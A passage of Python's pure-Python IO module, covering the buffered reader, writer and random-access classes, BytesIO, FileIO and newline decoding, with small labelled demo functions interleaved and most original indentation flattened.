"""Base class for buffered IO objects.
The main difference with RawIOBase is that the read() method
supports omitting the size argument, and does not have a default
implementation that defers to readinto().
In addition, read(), readinto() and write() may raise
BlockingIOError if the underlying raw stream is in non-blocking
mode and not ready; unlike their raw counterparts, they will never
return None.
A typical implementation should not inherit from a RawIOBase
implementation, but wrap one.
"""
def read(self, size=-1):
"""Read and return up to size bytes, where size is an int.
If the argument is omitted, None, or negative, reads and
returns all data until EOF.
If the argument is positive, and the underlying raw stream is
not 'interactive', multiple raw reads may be issued to satisfy
the byte count (unless EOF is reached first). But for
interactive raw streams (XXX and for pipes?), at most one raw
read will be issued, and a short result does not imply that
EOF is imminent.
Returns an empty bytes array on EOF.
Raises BlockingIOError if the underlying raw stream has no
data at the moment.
"""
self._unsupported("read")
def read1(self, size=-1):
"""Read up to size bytes with at most one read() system call,
where size is an int.
"""
self._unsupported("read1")
def readinto(self, b):
"""Read bytes into a pre-allocated bytes-like object b.
Like read(), this may issue multiple reads to the underlying raw
stream, unless the latter is 'interactive'.
Returns an int representing the number of bytes read (0 for EOF).
Raises BlockingIOError if the underlying raw stream has no
data at the moment.
"""
return self._readinto(b, read1=False)
def readinto1(self, b):
"""Read bytes into buffer *b*, using at most one system call
Returns an int representing the number of bytes read (0 for EOF).
Raises BlockingIOError if the underlying raw stream has no
data at the moment.
"""
return self._readinto(b, read1=True)
def _readinto(self, b, read1):
if not isinstance(b, memoryview):
b = memoryview(b)
b = b.cast('B')
if read1:
data = self.read1(len(b))
else:
data = self.read(len(b))
n = len(data)
b[:n] = data
return n
def write(self, b):
"""Write the given bytes buffer to the IO stream.
Return the number of bytes written, which is always the length of b
in bytes.
Raises BlockingIOError if the buffer is full and the
underlying raw stream cannot accept more data at the moment.
"""
self._unsupported("write")
def detach(self):
"""
Separate the underlying raw stream from the buffer and return it.
After the raw stream has been detached, the buffer is in an unusable
state.
"""
self._unsupported("detach")
io.BufferedIOBase.register(BufferedIOBase)
class _BufferedIOMixin(BufferedIOBase):
"""A mixin implementation of BufferedIOBase with an underlying raw stream.
This passes most requests on to the underlying raw stream. It
does *not* provide implementations of read(), readinto() or
write().
"""
def __init__(self, raw):
self._raw = raw
### Positioning ###
def seek(self, pos, whence=0):
new_position = self.raw.seek(pos, whence)
if new_position < 0:
raise OSError("seek() returned an invalid position")
return new_position
def tell(self):
pos = self.raw.tell()
if pos < 0:
raise OSError("tell() returned an invalid position")
return pos
def truncate(self, pos=None):
# Flush the stream. We're mixing buffered I/O with lower-level I/O,
# and a flush may be necessary to synch both views of the current
# file state.
self.flush()
if pos is None:
pos = self.tell()
# XXX: Should seek() be used, instead of passing the position
# XXX directly to truncate?
return self.raw.truncate(pos)
### Flush and close ###
def flush(self):
if self.closed:
raise ValueError("flush on closed file")
self.raw.flush()
def close(self):
if self.raw is not None and not self.closed:
try:
# may raise BlockingIOError or BrokenPipeError etc
self.flush()
finally:
self.raw.close()
def detach(self):
if self.raw is None:
raise ValueError("raw stream already detached")
self.flush()
raw = self._raw
self._raw = None
return raw
### Inquiries ###
def seekable(self):
return self.raw.seekable()
@property
def raw(self):
return self._raw
@property
def closed(self):
return self.raw.closed
@property
def name(self):
return self.raw.name
@property
def mode(self):
return self.raw.mode
def __getstate__(self):
raise TypeError(f"cannot pickle {self.__class__.__name__!r} object")
def __repr__(self):
modname = self.__class__.__module__
clsname = self.__class__.__qualname__
try:
name = self.name
except AttributeError:
return "<{}.{}>".format(modname, clsname)
else:
return "<{}.{} name={!r}>".format(modname, clsname, name)
### Lower-level APIs ###
def fileno(self):
return self.raw.fileno()
def isatty(self):
return self.raw.isatty()
class BytesIO(BufferedIOBase):
"""Buffered I/O implementation using an in-memory bytes buffer."""
# Initialize _buffer as soon as possible since it's used by __del__()
# which calls close()
_buffer = None
def __init__(self, initial_bytes=None):
buf = bytearray()
if initial_bytes is not None:
buf += initial_bytes
self._buffer = buf
self._pos = 0
def __getstate__(self):
if self.closed:
raise ValueError("__getstate__ on closed file")
return self.__dict__.copy()
def getvalue(self):
"""Return the bytes value (contents) of the buffer
"""
if self.closed:
raise ValueError("getvalue on closed file")
return bytes(self._buffer)
def getbuffer(self):
"""Return a readable and writable view of the buffer.
"""
if self.closed:
raise ValueError("getbuffer on closed file")
return memoryview(self._buffer)
def close(self):
if self._buffer is not None:
self._buffer.clear()
super().close()
def read(self, size=-1):
if self.closed:
raise ValueError("read from closed file")
if size is None:
size = -1
else:
try:
size_index = size.__index__
except AttributeError:
raise TypeError(f"{size!r} is not an integer")
else:
size = size_index()
if size < 0:
size = len(self._buffer)
if len(self._buffer) <= self._pos:
return b""
newpos = min(len(self._buffer), self._pos + size)
b = self._buffer[self._pos : newpos]
self._pos = newpos
return bytes(b)
def read1(self, size=-1):
"""This is the same as read.
"""
return self.read(size)
def write(self, b):
if self.closed:
raise ValueError("write to closed file")
if isinstance(b, str):
raise TypeError("can't write str to binary stream")
with memoryview(b) as view:
n = view.nbytes # Size of any bytes-like object
if n == 0:
return 0
pos = self._pos
if pos > len(self._buffer):
# Inserts null bytes between the current end of the file
# and the new write position.
padding = b'\x00' * (pos - len(self._buffer))
self._buffer += padding
self._buffer[pos:pos + n] = b
self._pos += n
return n
def seek(self, pos, whence=0):
if self.closed:
raise ValueError("seek on closed file")
try:
pos_index = pos.__index__
except AttributeError:
raise TypeError(f"{pos!r} is not an integer")
else:
pos = pos_index()
if whence == 0:
if pos < 0:
raise ValueError("negative seek position %r" % (pos,))
self._pos = pos
elif whence == 1:
self._pos = max(0, self._pos + pos)
elif whence == 2:
self._pos = max(0, len(self._buffer) + pos)
else:
raise ValueError("unsupported whence value")
return self._pos
def tell(self):
if self.closed:
raise ValueError("tell on closed file")
return self._pos
def truncate(self, pos=None):
if self.closed:
raise ValueError("truncate on closed file")
if pos is None:
pos = self._pos
else:
try:
pos_index = pos.__index__
except AttributeError:
raise TypeError(f"{pos!r} is not an integer")
else:
pos = pos_index()
if pos < 0:
raise ValueError("negative truncate position %r" % (pos,))
del self._buffer[pos:]
return pos
def readable(self):
if self.closed:
raise ValueError("I/O operation on closed file.")
return True
def writable(self):
if self.closed:
raise ValueError("I/O operation on closed file.")
return True
def seekable(self):
if self.closed:
raise ValueError("I/O operation on closed file.")
return True
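# --- Illustrative example (added; not part of the original module) ---
# Writing past the current end of a BytesIO pads the gap with NUL bytes,
# mirroring the sparse-write behavior implemented in write() above:
def _demo_bytesio_padding():
    b = BytesIO(b"ab")
    b.seek(4)                      # seeking beyond the end is allowed
    b.write(b"cd")                 # the 2-byte gap is filled with b"\x00"
    assert b.getvalue() == b"ab\x00\x00cd"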
class BufferedReader(_BufferedIOMixin):
"""BufferedReader(raw[, buffer_size])
    A buffer for a readable, sequential RawIOBase object.
The constructor creates a BufferedReader for the given readable raw
stream and buffer_size. If buffer_size is omitted, DEFAULT_BUFFER_SIZE
is used.
"""
def __init__(self, raw, buffer_size=DEFAULT_BUFFER_SIZE):
"""Create a new buffered reader using the given readable raw IO object.
"""
if not raw.readable():
raise OSError('"raw" argument must be readable.')
_BufferedIOMixin.__init__(self, raw)
if buffer_size <= 0:
raise ValueError("invalid buffer size")
self.buffer_size = buffer_size
self._reset_read_buf()
self._read_lock = Lock()
def readable(self):
return self.raw.readable()
def _reset_read_buf(self):
self._read_buf = b""
self._read_pos = 0
def read(self, size=None):
"""Read size bytes.
Returns exactly size bytes of data unless the underlying raw IO
stream reaches EOF or if the call would block in non-blocking
mode. If size is negative, read until EOF or until read() would
block.
"""
if size is not None and size < -1:
raise ValueError("invalid number of bytes to read")
with self._read_lock:
return self._read_unlocked(size)
def _read_unlocked(self, n=None):
nodata_val = b""
empty_values = (b"", None)
buf = self._read_buf
pos = self._read_pos
# Special case for when the number of bytes to read is unspecified.
if n is None or n == -1:
self._reset_read_buf()
if hasattr(self.raw, 'readall'):
chunk = self.raw.readall()
if chunk is None:
return buf[pos:] or None
else:
return buf[pos:] + chunk
chunks = [buf[pos:]] # Strip the consumed bytes.
current_size = 0
while True:
# Read until EOF or until read() would block.
chunk = self.raw.read()
if chunk in empty_values:
nodata_val = chunk
break
current_size += len(chunk)
chunks.append(chunk)
return b"".join(chunks) or nodata_val
# The number of bytes to read is specified, return at most n bytes.
avail = len(buf) - pos # Length of the available buffered data.
if n <= avail:
# Fast path: the data to read is fully buffered.
self._read_pos += n
return buf[pos:pos+n]
# Slow path: read from the stream until enough bytes are read,
# or until an EOF occurs or until read() would block.
chunks = [buf[pos:]]
wanted = max(self.buffer_size, n)
while avail < n:
chunk = self.raw.read(wanted)
if chunk in empty_values:
nodata_val = chunk
break
avail += len(chunk)
chunks.append(chunk)
# n is more than avail only when an EOF occurred or when
# read() would have blocked.
n = min(n, avail)
out = b"".join(chunks)
self._read_buf = out[n:] # Save the extra data in the buffer.
self._read_pos = 0
return out[:n] if out else nodata_val
def peek(self, size=0):
"""Returns buffered bytes without advancing the position.
The argument indicates a desired minimal number of bytes; we
do at most one raw read to satisfy it. We never return more
than self.buffer_size.
"""
with self._read_lock:
return self._peek_unlocked(size)
def _peek_unlocked(self, n=0):
want = min(n, self.buffer_size)
have = len(self._read_buf) - self._read_pos
if have < want or have <= 0:
to_read = self.buffer_size - have
current = self.raw.read(to_read)
if current:
self._read_buf = self._read_buf[self._read_pos:] + current
self._read_pos = 0
return self._read_buf[self._read_pos:]
def read1(self, size=-1):
"""Reads up to size bytes, with at most one read() system call."""
# Returns up to size bytes. If at least one byte is buffered, we
# only return buffered bytes. Otherwise, we do one raw read.
if size < 0:
size = self.buffer_size
if size == 0:
return b""
with self._read_lock:
self._peek_unlocked(1)
return self._read_unlocked(
min(size, len(self._read_buf) - self._read_pos))
# Implementing readinto() and readinto1() is not strictly necessary (we
# could rely on the base class that provides an implementation in terms of
# read() and read1()). We do it anyway to keep the _pyio implementation
# similar to the io implementation (which implements the methods for
# performance reasons).
def _readinto(self, buf, read1):
"""Read data into *buf* with at most one system call."""
# Need to create a memoryview object of type 'b', otherwise
# we may not be able to assign bytes to it, and slicing it
# would create a new object.
if not isinstance(buf, memoryview):
buf = memoryview(buf)
if buf.nbytes == 0:
return 0
buf = buf.cast('B')
written = 0
with self._read_lock:
while written < len(buf):
# First try to read from internal buffer
avail = min(len(self._read_buf) - self._read_pos, len(buf))
if avail:
buf[written:written+avail] = \
self._read_buf[self._read_pos:self._read_pos+avail]
self._read_pos += avail
written += avail
if written == len(buf):
break
                # If remaining space in the caller's buffer is larger than
                # the internal buffer, read directly into the caller's buffer
if len(buf) - written > self.buffer_size:
n = self.raw.readinto(buf[written:])
if not n:
break # eof
written += n
# Otherwise refill internal buffer - unless we're
# in read1 mode and already got some data
elif not (read1 and written):
if not self._peek_unlocked(1):
break # eof
# In readinto1 mode, return as soon as we have some data
if read1 and written:
break
return written
def tell(self):
return _BufferedIOMixin.tell(self) - len(self._read_buf) + self._read_pos
def seek(self, pos, whence=0):
if whence not in valid_seek_flags:
raise ValueError("invalid whence value")
with self._read_lock:
if whence == 1:
pos -= len(self._read_buf) - self._read_pos
pos = _BufferedIOMixin.seek(self, pos, whence)
self._reset_read_buf()
return pos
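# --- Illustrative example (added; not part of the original module) ---
# peek() returns buffered bytes without consuming them, while read()
# consumes; BytesIO stands in for the raw stream here (it passes the
# readable() check even though it is not a true RawIOBase):
def _demo_buffered_reader():
    reader = BufferedReader(BytesIO(b"hello world"))
    assert reader.peek(5).startswith(b"hello")   # position unchanged
    assert reader.read(5) == b"hello"
    assert reader.read() == b" world"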
class BufferedWriter(_BufferedIOMixin):
"""A buffer for a writeable sequential RawIO object.
The constructor creates a BufferedWriter for the given writeable raw
stream. If the buffer_size is not given, it defaults to
DEFAULT_BUFFER_SIZE.
"""
def __init__(self, raw, buffer_size=DEFAULT_BUFFER_SIZE):
if not raw.writable():
raise OSError('"raw" argument must be writable.')
_BufferedIOMixin.__init__(self, raw)
if buffer_size <= 0:
raise ValueError("invalid buffer size")
self.buffer_size = buffer_size
self._write_buf = bytearray()
self._write_lock = Lock()
def writable(self):
return self.raw.writable()
def write(self, b):
if isinstance(b, str):
raise TypeError("can't write str to binary stream")
with self._write_lock:
if self.closed:
raise ValueError("write to closed file")
# XXX we can implement some more tricks to try and avoid
# partial writes
if len(self._write_buf) > self.buffer_size:
# We're full, so let's pre-flush the buffer. (This may
# raise BlockingIOError with characters_written == 0.)
self._flush_unlocked()
before = len(self._write_buf)
self._write_buf.extend(b)
written = len(self._write_buf) - before
if len(self._write_buf) > self.buffer_size:
try:
self._flush_unlocked()
except BlockingIOError as e:
if len(self._write_buf) > self.buffer_size:
# We've hit the buffer_size. We have to accept a partial
# write and cut back our buffer.
overage = len(self._write_buf) - self.buffer_size
written -= overage
self._write_buf = self._write_buf[:self.buffer_size]
raise BlockingIOError(e.errno, e.strerror, written)
return written
def truncate(self, pos=None):
with self._write_lock:
self._flush_unlocked()
if pos is None:
pos = self.raw.tell()
return self.raw.truncate(pos)
def flush(self):
with self._write_lock:
self._flush_unlocked()
def _flush_unlocked(self):
if self.closed:
raise ValueError("flush on closed file")
while self._write_buf:
try:
n = self.raw.write(self._write_buf)
except BlockingIOError:
raise RuntimeError("self.raw should implement RawIOBase: it "
"should not raise BlockingIOError")
if n is None:
raise BlockingIOError(
errno.EAGAIN,
"write could not complete without blocking", 0)
if n > len(self._write_buf) or n < 0:
raise OSError("write() returned incorrect number of bytes")
del self._write_buf[:n]
def tell(self):
return _BufferedIOMixin.tell(self) + len(self._write_buf)
def seek(self, pos, whence=0):
if whence not in valid_seek_flags:
raise ValueError("invalid whence value")
with self._write_lock:
self._flush_unlocked()
return _BufferedIOMixin.seek(self, pos, whence)
def close(self):
with self._write_lock:
if self.raw is None or self.closed:
return
# We have to release the lock and call self.flush() (which will
# probably just re-take the lock) in case flush has been overridden in
# a subclass or the user set self.flush to something. This is the same
# behavior as the C implementation.
try:
# may raise BlockingIOError or BrokenPipeError etc
self.flush()
finally:
with self._write_lock:
self.raw.close()
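# --- Illustrative example (added; not part of the original module) ---
# Writes smaller than buffer_size accumulate in the internal bytearray and
# only reach the underlying stream on flush() (or once the buffer fills):
def _demo_buffered_writer():
    raw = BytesIO()
    writer = BufferedWriter(raw, buffer_size=16)
    writer.write(b"abc")
    assert raw.getvalue() == b""   # still sitting in the write buffer
    writer.flush()
    assert raw.getvalue() == b"abc"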
class BufferedRWPair(BufferedIOBase):
"""A buffered reader and writer object together.
A buffered reader object and buffered writer object put together to
form a sequential IO object that can read and write. This is typically
used with a socket or two-way pipe.
reader and writer are RawIOBase objects that are readable and
writeable respectively. If the buffer_size is omitted it defaults to
DEFAULT_BUFFER_SIZE.
"""
# XXX The usefulness of this (compared to having two separate IO
# objects) is questionable.
def __init__(self, reader, writer, buffer_size=DEFAULT_BUFFER_SIZE):
"""Constructor.
The arguments are two RawIO instances.
"""
if not reader.readable():
raise OSError('"reader" argument must be readable.')
if not writer.writable():
raise OSError('"writer" argument must be writable.')
self.reader = BufferedReader(reader, buffer_size)
self.writer = BufferedWriter(writer, buffer_size)
def read(self, size=-1):
if size is None:
size = -1
return self.reader.read(size)
def readinto(self, b):
return self.reader.readinto(b)
def write(self, b):
return self.writer.write(b)
def peek(self, size=0):
return self.reader.peek(size)
def read1(self, size=-1):
return self.reader.read1(size)
def readinto1(self, b):
return self.reader.readinto1(b)
def readable(self):
return self.reader.readable()
def writable(self):
return self.writer.writable()
def flush(self):
return self.writer.flush()
def close(self):
try:
self.writer.close()
finally:
self.reader.close()
def isatty(self):
return self.reader.isatty() or self.writer.isatty()
@property
def closed(self):
return self.writer.closed
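# --- Illustrative example (added; not part of the original module) ---
# A pipe provides exactly the reader/writer pair this class expects; the
# two FileIO objects below wrap the pipe's file descriptors:
def _demo_rw_pair():
    r_fd, w_fd = os.pipe()
    pair = BufferedRWPair(FileIO(r_fd, "r"), FileIO(w_fd, "w"))
    pair.write(b"ping")
    pair.flush()                   # push the bytes through the pipe
    data = pair.read(4)            # reads back what was just written
    pair.close()
    return data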
class BufferedRandom(BufferedWriter, BufferedReader):
"""A buffered interface to random access streams.
The constructor creates a reader and writer for a seekable stream,
raw, given in the first argument. If the buffer_size is omitted it
defaults to DEFAULT_BUFFER_SIZE.
"""
def __init__(self, raw, buffer_size=DEFAULT_BUFFER_SIZE):
raw._checkSeekable()
BufferedReader.__init__(self, raw, buffer_size)
BufferedWriter.__init__(self, raw, buffer_size)
def seek(self, pos, whence=0):
if whence not in valid_seek_flags:
raise ValueError("invalid whence value")
self.flush()
if self._read_buf:
# Undo read ahead.
with self._read_lock:
self.raw.seek(self._read_pos - len(self._read_buf), 1)
# First do the raw seek, then empty the read buffer, so that
# if the raw seek fails, we don't lose buffered data forever.
pos = self.raw.seek(pos, whence)
with self._read_lock:
self._reset_read_buf()
if pos < 0:
raise OSError("seek() returned invalid position")
return pos
def tell(self):
if self._write_buf:
return BufferedWriter.tell(self)
else:
return BufferedReader.tell(self)
def truncate(self, pos=None):
if pos is None:
pos = self.tell()
# Use seek to flush the read buffer.
return BufferedWriter.truncate(self, pos)
def read(self, size=None):
if size is None:
size = -1
self.flush()
return BufferedReader.read(self, size)
def readinto(self, b):
self.flush()
return BufferedReader.readinto(self, b)
def peek(self, size=0):
self.flush()
return BufferedReader.peek(self, size)
def read1(self, size=-1):
self.flush()
return BufferedReader.read1(self, size)
def readinto1(self, b):
self.flush()
return BufferedReader.readinto1(self, b)
def write(self, b):
if self._read_buf:
# Undo readahead
with self._read_lock:
self.raw.seek(self._read_pos - len(self._read_buf), 1)
self._reset_read_buf()
return BufferedWriter.write(self, b)
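# --- Illustrative example (added; not part of the original module) ---
# BufferedRandom keeps the read and write buffers consistent: a write
# first rewinds any readahead, so interleaved access behaves as expected:
def _demo_buffered_random():
    f = BufferedRandom(BytesIO(b"0123456789"))
    assert f.read(4) == b"0123"
    f.write(b"XY")                 # overwrite at the current position
    f.seek(0)
    assert f.read() == b"0123XY6789"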
class FileIO(RawIOBase):
_fd = -1
_created = False
_readable = False
_writable = False
_appending = False
_seekable = None
_closefd = True
def __init__(self, file, mode='r', closefd=True, opener=None):
"""Open a file. The mode can be 'r' (default), 'w', 'x' or 'a' for reading,
writing, exclusive creation or appending. The file will be created if it
doesn't exist when opened for writing or appending; it will be truncated
when opened for writing. A FileExistsError will be raised if it already
exists when opened for creating. Opening a file for creating implies
writing so this mode behaves in a similar way to 'w'. Add a '+' to the mode
to allow simultaneous reading and writing. A custom opener can be used by
passing a callable as *opener*. The underlying file descriptor for the file
object is then obtained by calling opener with (*name*, *flags*).
*opener* must return an open file descriptor (passing os.open as *opener*
results in functionality similar to passing None).
"""
if self._fd >= 0:
# Have to close the existing file first.
try:
if self._closefd:
os.close(self._fd)
finally:
self._fd = -1
if isinstance(file, float):
raise TypeError('integer argument expected, got float')
if isinstance(file, int):
fd = file
if fd < 0:
raise ValueError('negative file descriptor')
else:
fd = -1
if not isinstance(mode, str):
raise TypeError('invalid mode: %s' % (mode,))
if not set(mode) <= set('xrwab+'):
raise ValueError('invalid mode: %s' % (mode,))
if sum(c in 'rwax' for c in mode) != 1 or mode.count('+') > 1:
raise ValueError('Must have exactly one of create/read/write/append '
'mode and at most one plus')
if 'x' in mode:
self._created = True
self._writable = True
flags = os.O_EXCL | os.O_CREAT
elif 'r' in mode:
self._readable = True
flags = 0
elif 'w' in mode:
self._writable = True
flags = os.O_CREAT | os.O_TRUNC
elif 'a' in mode:
self._writable = True
self._appending = True
flags = os.O_APPEND | os.O_CREAT
if '+' in mode:
self._readable = True
self._writable = True
if self._readable and self._writable:
flags |= os.O_RDWR
elif self._readable:
flags |= os.O_RDONLY
else:
flags |= os.O_WRONLY
flags |= getattr(os, 'O_BINARY', 0)
noinherit_flag = (getattr(os, 'O_NOINHERIT', 0) or
getattr(os, 'O_CLOEXEC', 0))
flags |= noinherit_flag
owned_fd = None
try:
if fd < 0:
if not closefd:
raise ValueError('Cannot use closefd=False with file name')
if opener is None:
fd = os.open(file, flags, 0o666)
else:
fd = opener(file, flags)
if not isinstance(fd, int):
raise TypeError('expected integer from opener')
if fd < 0:
raise OSError('Negative file descriptor')
owned_fd = fd
if not noinherit_flag:
os.set_inheritable(fd, False)
self._closefd = closefd
fdfstat = os.fstat(fd)
try:
if stat.S_ISDIR(fdfstat.st_mode):
raise IsADirectoryError(errno.EISDIR,
os.strerror(errno.EISDIR), file)
except AttributeError:
                # Ignore the AttributeError if stat.S_ISDIR or errno.EISDIR
# don't exist.
pass
self._blksize = getattr(fdfstat, 'st_blksize', 0)
if self._blksize <= 1:
self._blksize = DEFAULT_BUFFER_SIZE
if _setmode:
# don't translate newlines (\r\n <=> \n)
_setmode(fd, os.O_BINARY)
self.name = file
if self._appending:
# For consistent behaviour, we explicitly seek to the
# end of file (otherwise, it might be done only on the
# first write()).
os.lseek(fd, 0, SEEK_END)
except:
if owned_fd is not None:
os.close(owned_fd)
raise
self._fd = fd
def __del__(self):
if self._fd >= 0 and self._closefd and not self.closed:
import warnings
warnings.warn('unclosed file %r' % (self,), ResourceWarning,
stacklevel=2, source=self)
self.close()
def __getstate__(self):
raise TypeError(f"cannot pickle {self.__class__.__name__!r} object")
def __repr__(self):
class_name = '%s.%s' % (self.__class__.__module__,
self.__class__.__qualname__)
if self.closed:
return '<%s [closed]>' % class_name
try:
name = self.name
except AttributeError:
return ('<%s fd=%d mode=%r closefd=%r>' %
(class_name, self._fd, self.mode, self._closefd))
else:
return ('<%s name=%r mode=%r closefd=%r>' %
(class_name, name, self.mode, self._closefd))
def _checkReadable(self):
if not self._readable:
raise UnsupportedOperation('File not open for reading')
def _checkWritable(self, msg=None):
if not self._writable:
raise UnsupportedOperation('File not open for writing')
def read(self, size=None):
"""Read at most size bytes, returned as bytes.
        Only makes one system call, so less data may be returned than requested.
In non-blocking mode, returns None if no data is available.
Return an empty bytes object at EOF.
"""
self._checkClosed()
self._checkReadable()
if size is None or size < 0:
return self.readall()
try:
return os.read(self._fd, size)
except BlockingIOError:
return None
def readall(self):
"""Read all data from the file, returned as bytes.
In non-blocking mode, returns as much as is immediately available,
or None if no data is available. Return an empty bytes object at EOF.
"""
self._checkClosed()
self._checkReadable()
bufsize = DEFAULT_BUFFER_SIZE
try:
pos = os.lseek(self._fd, 0, SEEK_CUR)
end = os.fstat(self._fd).st_size
if end >= pos:
bufsize = end - pos + 1
except OSError:
pass
result = bytearray()
while True:
if len(result) >= bufsize:
bufsize = len(result)
bufsize += max(bufsize, DEFAULT_BUFFER_SIZE)
n = bufsize - len(result)
try:
chunk = os.read(self._fd, n)
except BlockingIOError:
if result:
break
return None
if not chunk: # reached the end of the file
break
result += chunk
return bytes(result)
def readinto(self, b):
"""Same as RawIOBase.readinto()."""
m = memoryview(b).cast('B')
data = self.read(len(m))
n = len(data)
m[:n] = data
return n
def write(self, b):
"""Write bytes b to file, return number written.
Only makes one system call, so not all of the data may be written.
The number of bytes actually written is returned. In non-blocking mode,
returns None if the write would block.
"""
self._checkClosed()
self._checkWritable()
try:
return os.write(self._fd, b)
except BlockingIOError:
return None
def seek(self, pos, whence=SEEK_SET):
"""Move to new file position.
Argument offset is a byte count. Optional argument whence defaults to
SEEK_SET or 0 (offset from start of file, offset should be >= 0); other values
are SEEK_CUR or 1 (move relative to current position, positive or negative),
and SEEK_END or 2 (move relative to end of file, usually negative, although
many platforms allow seeking beyond the end of a file).
Note that not all file objects are seekable.
"""
if isinstance(pos, float):
raise TypeError('an integer is required')
self._checkClosed()
return os.lseek(self._fd, pos, whence)
def tell(self):
"""tell() -> int. Current file position.
        Can raise OSError for non-seekable files."""
self._checkClosed()
return os.lseek(self._fd, 0, SEEK_CUR)
def truncate(self, size=None):
"""Truncate the file to at most size bytes.
Size defaults to the current file position, as returned by tell().
The current file position is changed to the value of size.
"""
self._checkClosed()
self._checkWritable()
if size is None:
size = self.tell()
os.ftruncate(self._fd, size)
return size
def close(self):
"""Close the file.
A closed file cannot be used for further I/O operations. close() may be
called more than once without error.
"""
if not self.closed:
try:
if self._closefd:
os.close(self._fd)
finally:
super().close()
def seekable(self):
"""True if file supports random-access."""
self._checkClosed()
if self._seekable is None:
try:
self.tell()
except OSError:
self._seekable = False
else:
self._seekable = True
return self._seekable
def readable(self):
"""True if file was opened in a read mode."""
self._checkClosed()
return self._readable
def writable(self):
"""True if file was opened in a write mode."""
self._checkClosed()
return self._writable
def fileno(self):
"""Return the underlying file descriptor (an integer)."""
self._checkClosed()
return self._fd
def isatty(self):
"""True if the file is connected to a TTY device."""
self._checkClosed()
return os.isatty(self._fd)
@property
def closefd(self):
"""True if the file descriptor will be closed by close()."""
return self._closefd
@property
def mode(self):
"""String giving the file mode"""
if self._created:
if self._readable:
return 'xb+'
else:
return 'xb'
elif self._appending:
if self._readable:
return 'ab+'
else:
return 'ab'
elif self._readable:
if self._writable:
return 'rb+'
else:
return 'rb'
else:
return 'wb'
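# --- Illustrative example (added; not part of the original module) ---
# The mode property above is derived from the open flags, and a custom
# opener receives the (name, flags) pair computed in __init__; passing
# os.open as the opener reproduces the default behavior:
def _demo_fileio_opener():
    import tempfile
    fd, path = tempfile.mkstemp()
    os.close(fd)
    try:
        f = FileIO(path, "r+", opener=os.open)
        assert f.mode == "rb+"     # read/write reports as 'rb+' at this layer
        f.close()
    finally:
        os.remove(path)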
class TextIOBase(IOBase):
"""Base class for text I/O.
This class provides a character and line based interface to stream
I/O. There is no public constructor.
"""
def read(self, size=-1):
"""Read at most size characters from stream, where size is an int.
Read from underlying buffer until we have size characters or we hit EOF.
If size is negative or omitted, read until EOF.
Returns a string.
"""
self._unsupported("read")
def write(self, s):
"""Write string s to stream and returning an int."""
self._unsupported("write")
def truncate(self, pos=None):
"""Truncate size to pos, where pos is an int."""
self._unsupported("truncate")
def readline(self):
"""Read until newline or EOF.
Returns an empty string if EOF is hit immediately.
"""
self._unsupported("readline")
def detach(self):
"""
Separate the underlying buffer from the TextIOBase and return it.
After the underlying buffer has been detached, the TextIO is in an
unusable state.
"""
self._unsupported("detach")
@property
def encoding(self):
"""Subclasses should override."""
return None
@property
def newlines(self):
"""Line endings translated so far.
Only line endings translated during reading are considered.
Subclasses should override.
"""
return None
@property
def errors(self):
"""Error setting of the decoder or encoder.
Subclasses should override."""
return None
io.TextIOBase.register(TextIOBase)
class IncrementalNewlineDecoder(codecs.IncrementalDecoder):
r"""Codec used when reading a file in universal newlines mode. It wraps
another incremental decoder, translating \r\n and \r into \n. It also
records the types of newlines encountered. When used with
translate=False, it ensures that the newline sequence is returned in
one piece.
"""
def __init__(self, decoder, translate, errors='strict'):
codecs.IncrementalDecoder.__init__(self, errors=errors)
self.translate = translate
self.decoder = decoder
self.seennl = 0
self.pendingcr = False
def decode(self, input, final=False):
# decode input (with the eventual \r from a previous pass)
if self.decoder is None:
output = input
else:
output = self.decoder.decode(input, final=final)
if self.pendingcr and (output or final):
output = "\r" + output
self.pendingcr = False
# retain last \r even when not translating data:
# then readline() is sure to get \r\n in one pass
if output.endswith("\r") and not final:
output = output[:-1]
self.pendingcr = True
# Record which newlines are read
crlf = output.count('\r\n')
cr = output.count('\r') - crlf
lf = output.count('\n') - crlf
self.seennl |= (lf and self._LF) | (cr and self._CR) \
| (crlf and self._CRLF)
if self.translate:
if crlf:
output = output.replace("\r\n", "\n")
if cr:
output = output.replace("\r", "\n")
return output
def getstate(self):
if self.decoder is None:
buf = b""
flag = 0
else:
buf, flag = self.decoder.getstate()
flag <<= 1
if self.pendingcr:
flag |= 1
return buf, flag
def setstate(self, state):
buf, flag = state
self.pendingcr = bool(flag & 1)
if self.decoder is not None:
self.decoder.setstate((buf, flag >> 1))
def reset(self):
self.seennl = 0
self.pendingcr = False
if self.decoder is not None:
self.decoder.reset()
_LF = 1
_CR = 2
_CRLF = 4
@property
def newlines(self):
return (None,
"\n",
"\r",
("\r", "\n"),
"\r\n",
("\n", "\r\n"),
("\r", "\r\n"),
("\r", "\n", "\r\n")
)[self.seennl]
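# --- Illustrative example (added; not part of the original module) ---
# With translate=True the decoder collapses \r and \r\n into \n, and the
# seennl bitmask drives the newlines property; decoder=None means the
# input is already str:
def _demo_newline_decoder():
    dec = IncrementalNewlineDecoder(decoder=None, translate=True)
    assert dec.decode("a\r\nb\rc\n", final=True) == "a\nb\nc\n"
    assert dec.newlines == ("\r", "\n", "\r\n")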
class TextIOWrapper(TextIOBase):
r"""Character and line based layer over a BufferedIOBase object, buffer.
encoding gives the name of the encoding that the stream will be
decoded or encoded with. It defaults to locale.getpreferredencoding(False).
errors determines the strictness of encoding and decoding (see the
codecs.register) and defaults to "strict".
newline can be None, '', '\n', '\r', or '\r\n'. It controls the
handling of line endings. If it is None, universal newlines is
    enabled. With this enabled, on input, the line endings '\n', '\r',
or '\r\n' are translated to '\n' before being returned to the
caller. Conversely, on output, '\n' is translated to the system
default line separator, os.linesep. If newline is any other of its
legal values, that newline becomes the newline when the file is read
and it is returned untranslated. On output, '\n' is converted to the
newline.
If line_buffering is True, a call to flush is implied when a call to
write contains a newline character.
"""
_CHUNK_SIZE = 2048
# Initialize _buffer as soon as possible since it's used by __del__()
# which calls close()
_buffer = None
# The write_through argument has no effect here since this
# implementation always writes through. The argument is present only
# so that the signature can match the signature of the C version.
def __init__(self, buffer, encoding=None, errors=None, newline=None,
line_buffering=False, write_through=False):
self._check_newline(newline)
if encoding is None:
try:
encoding = os.device_encoding(buffer.fileno())
except (AttributeError, UnsupportedOperation):
pass
if encoding is None:
try:
import locale
except ImportError:
# Importing locale may fail if Python is being built
encoding = "ascii"
else:
encoding = locale.getpreferredencoding(False)
if not isinstance(encoding, str):
raise ValueError("invalid encoding: %r" % encoding)
if not codecs.lookup(encoding)._is_text_encoding:
msg = ("%r is not a text encoding; "
"use codecs.open() to handle arbitrary codecs")
raise LookupError(msg % encoding)
if errors is None:
